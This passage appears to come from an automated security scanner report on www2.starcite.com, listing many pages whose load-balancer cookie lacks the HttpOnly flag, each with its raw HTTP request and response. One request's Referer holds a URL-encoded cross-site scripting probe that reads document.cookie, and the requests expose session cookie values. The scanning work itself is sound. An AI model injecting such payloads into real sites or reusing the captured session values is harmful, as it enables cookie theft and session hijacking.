The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/slide4small.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:23 GMT
Server: Apache
Last-Modified: Sun, 25 Apr 2010 19:47:59 GMT
ETag: "10000000031f7-24ba-48514effcb9c0"
Accept-Ranges: bytes
Content-Length: 9402
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:49 GMT;path=/

...[SNIP]...

2.111. http://www2.starcite.com/starcite/solutions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/solutions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/solutions HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=17
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:31 GMT;path=/
Content-Length: 13948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.112. http://www2.starcite.com/starcite/supplier-video/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/supplier-video/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/supplier-video/index.html HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:49 GMT
Server: Apache
Last-Modified: Wed, 06 Jan 2010 18:50:33 GMT
ETag: "1000000003131-938-47c836dedd976"
Accept-Ranges: bytes
Content-Length: 2360
Keep-Alive: timeout=5, max=38
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:15 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<title>Sta
...[SNIP]...

2.113. http://www2.starcite.com/starcite/suppliers/howitworks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/suppliers/howitworks

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/suppliers/howitworks HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:12 GMT;path=/
Content-Length: 25233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.114. http://www2.starcite.com/starcite/themes/garland/iestyle.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/iestyle.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/iestyle.css HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:29 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 20:21:54 GMT
ETag: "100000000319d-a7-47f58e6ddfc80"
Accept-Ranges: bytes
Content-Length: 167
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:32:55 GMT;path=/


       #slideshow-area {
       margin-left:0px;
       background:url('images/header_top-ie.png') no-repeat scroll 0 0;
       }
       #slideshow {
       margin:0 0 0 -5px;
       height:247px;
       }

2.115. http://www2.starcite.com/starcite/themes/garland/iestyle6.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/iestyle6.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/iestyle6.css HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:29 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 20:27:16 GMT
ETag: "100000000319e-13e-47f58fa0f5100"
Accept-Ranges: bytes
Content-Length: 318
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:32:55 GMT;path=/

#slideshow #slidesContainer {
margin:0 auto;
width:949px;
height:257px;
overflow:auto; /* allow scrollbar */
position:relative;
}


       #slideshow-area {
       margin-left:5px;
       backgro
...[SNIP]...

2.116. http://www2.starcite.com/starcite/themes/garland/images/arrow_small.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/arrow_small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/arrow_small.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:43 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002c69-36b-455110eec1300"
Accept-Ranges: bytes
Content-Length: 875
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:09 GMT;path=/

...[SNIP]...

2.117. http://www2.starcite.com/starcite/themes/garland/images/bg_image.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/bg_image.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/bg_image.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:28 GMT
Server: Apache
Last-Modified: Mon, 18 Aug 2008 23:52:00 GMT
ETag: "1000000002c72-6e-454c4a8410800"
Accept-Ranges: bytes
Content-Length: 110
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:54 GMT;path=/

2.118. http://www2.starcite.com/starcite/themes/garland/images/block_bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/block_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/block_bg.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:31 GMT
Server: Apache
Last-Modified: Thu, 14 Aug 2008 20:34:00 GMT
ETag: "1000000002c7c-10d-454716cc91e00"
Accept-Ranges: bytes
Content-Length: 269
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:57 GMT;path=/

2.119. http://www2.starcite.com/starcite/themes/garland/images/blue_bdr.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/blue_bdr.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/blue_bdr.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:42 GMT
Server: Apache
Last-Modified: Fri, 12 Sep 2008 03:18:00 GMT
ETag: "1000000002c7e-257d-456aa5528aa00"
Accept-Ranges: bytes
Content-Length: 9597
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:07 GMT;path=/

2.120. http://www2.starcite.com/starcite/themes/garland/images/blue_lbdr.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/blue_lbdr.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/blue_lbdr.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:42 GMT
Server: Apache
Last-Modified: Fri, 12 Sep 2008 03:18:00 GMT
ETag: "1000000002c82-2247-456aa5528aa00"
Accept-Ranges: bytes
Content-Length: 8775
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:07 GMT;path=/

2.121. http://www2.starcite.com/starcite/themes/garland/images/blue_rbdr.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/blue_rbdr.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/blue_rbdr.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:45 GMT
Server: Apache
Last-Modified: Fri, 12 Sep 2008 03:18:00 GMT
ETag: "1000000002c84-224d-456aa5528aa00"
Accept-Ranges: bytes
Content-Length: 8781
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:11 GMT;path=/

2.122. http://www2.starcite.com/starcite/themes/garland/images/btn_continue.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/btn_continue.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/btn_continue.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __unam=2392472-12d471e5d4f-40cdc366-1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:08 GMT
Server: Apache
Last-Modified: Mon, 08 Sep 2008 20:42:00 GMT
ETag: "1000000002c98-47d-45668736db600"
Accept-Ranges: bytes
Content-Length: 1149
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:34 GMT;path=/

2.123. http://www2.starcite.com/starcite/themes/garland/images/btn_sec_left.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/btn_sec_left.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/btn_sec_left.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:43 GMT
Server: Apache
Last-Modified: Tue, 19 Aug 2008 18:48:00 GMT
ETag: "1000000002c9e-39c-454d486e81800"
Accept-Ranges: bytes
Content-Length: 924
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:09 GMT;path=/

2.124. http://www2.starcite.com/starcite/themes/garland/images/btn_sec_right.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/btn_sec_right.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/btn_sec_right.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:44 GMT
Server: Apache
Last-Modified: Tue, 19 Aug 2008 18:48:00 GMT
ETag: "1000000002c9f-39b-454d486e81800"
Accept-Ranges: bytes
Content-Length: 923
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:10 GMT;path=/

2.125. http://www2.starcite.com/starcite/themes/garland/images/content_left_bg0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/content_left_bg0.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/content_left_bg0.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:27 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:10:00 GMT
ETag: "1000000002ca5-64-45799f17daa00"
Accept-Ranges: bytes
Content-Length: 100
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:53 GMT;path=/

2.126. http://www2.starcite.com/starcite/themes/garland/images/content_right_bg0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/content_right_bg0.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/content_right_bg0.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:32 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:10:00 GMT
ETag: "1000000002ca7-62-45799f17daa00"
Accept-Ranges: bytes
Content-Length: 98
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:57 GMT;path=/

2.127. http://www2.starcite.com/starcite/themes/garland/images/footer-boxleft.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/footer-boxleft.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
